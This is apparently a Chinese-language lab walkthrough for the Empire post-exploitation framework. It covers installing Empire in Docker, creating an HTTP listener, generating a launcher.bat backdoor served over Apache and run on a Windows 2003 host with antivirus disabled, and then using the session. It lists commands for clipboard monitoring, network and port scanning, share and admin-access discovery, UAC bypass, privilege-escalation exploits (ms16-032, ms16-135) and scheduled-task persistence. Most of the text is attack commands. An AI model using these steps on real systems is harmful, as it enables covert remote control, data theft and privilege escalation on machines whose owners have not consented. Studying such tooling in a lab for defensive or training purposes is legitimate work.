一.安装Empire
我用了Dendian 10.x和CentOs来下载都不行,要用docker容器
下载docker容器
sudo apt update
sudo apt install docker.io
安装过程看这个
docker安装empire2.5_docker run -it -p 7000:7000 --name empire empirepr-CSDN博客
二.使用Empire
启动docker容器
docker run -it -p 7000:7000 --name empire empireproject/empire /bin/bash
sudo ./setup/reset.sh
sudo /usr/local/bin/pip2.7 install pefile
sudo ./empire
开启empire容器
docker start 4c6f1f1ceb028a9edb62b6a99cbf516560071359fd6cfa47866c8697eb3b4f3c
docker exec -it 4c6f1f1ceb028a9edb62b6a99cbf516560071359fd6cfa47866c8697eb3b4f3c /bin/bash
./empire
1.打开监听器
(因为我的empire是在docker中运行的,所以监听器的ip要用本机的ip地址,请求由本机的7000端口发送)
详情见:docker下安装Empire与Empire简单使用 - summer14 - 博客园 (cnblogs.com)
Listeners进入监听器 按tab键可以补全命令
Uselistener 选择监听器 + tab补全
Uselistener http进入监听器的http模块
Info 查看http模块的信息
Set Name Test
Set Host http://ip:8888 设置监听器信息
Set Port 8888
Stagingkey 是随机生成匹配用的
Execute 执行
Back 退出监听器,list可以查看有多少个监听器,kill test 可以删除名为test的监听器
2.Tager 生成后门
Usestager + tab 显示管理后门的模块
Usestager windows/launcher_bat 选择windows/launcher_bat模块
Info 查看参数
Help 看帮助文档
Listeners 查看有什么监听器
Set Listener test 设置监听器为test
Set OutFile /var/www/html/launcher.bat
Execute 生成文件到/var/www/html/launcher.bat目录内容是Shell,木马
因为这个文件生成在empire容器内,是访问不到的,要把这个文件移动到~/var/www/html
启动apache2
/etc/init.d/apache2 start
开启windows 2003
浏览器下载http://ip//launcher.bat杀毒都关了
点击运行launcher木马文件
太老的操作系统用不了这木马命令
打开linux可以看到已经连接上了windows 2003进行会话
Agents查看当前活动代理,windows 2003主机信息
Interact 选择一个当前会话
Rename GS9CDTMR win11 改变会话名字为win11
Info 查看信息
Sysinfo 查看windows 2003 的主机信息如ip,操作系统等
Help agentcmds 查看shell命令,然后直接用就行
如:del test.txt删除文件,upload test.txt(文件要放在Empire目录下),cat test.txt 查看文件内容,sc截屏命令,截屏以后保存在显示的文件夹内
如果没见听到:
interact wind7
Bypassuac test
使用 list stale 命令 列出已经丢失的反弹主机,然后输入remove stale 命令删除已经失效的主机
剪切板usemodule collection/clipboard_monitor
Set PollInterval 1 一分钟刷新记录,一分钟内剪切板有内容就显示在linux上
Execute 执行
三.常见模块的使用
Agents 进入会话
Agents list 查看会话
Ineract Z9… 选择会话
Sysinfo 查看系统信息
Sleep 0 间隔时间设为0,马上执行我们的操作
- 主机发现
arp扫描
situational_awareness/network/arpscan
set Range 192.168.0.1-192.168.0.100
execute
smb扫描
network/smbscanner
- 端口扫描
usemodule situational_awareness/network/portscan
- 查找本地管理员的主机
situational_awareness/network/powerview/find_localadmin_access
- 查看共享文件
situational_awareness/network/powerview/share_finder
- 本地信息收集
situational_awareness/host/winenum
- 提权
bypassuac
privesc/bypassuac
扫描环境向量提权
privesc/powerup/allchecks
计划任务system提权
persistence/elevated/schtasks
set Listener test
溢出提权漏洞
powershell/privesc/ms16-032
powershell/privesc/ms16-135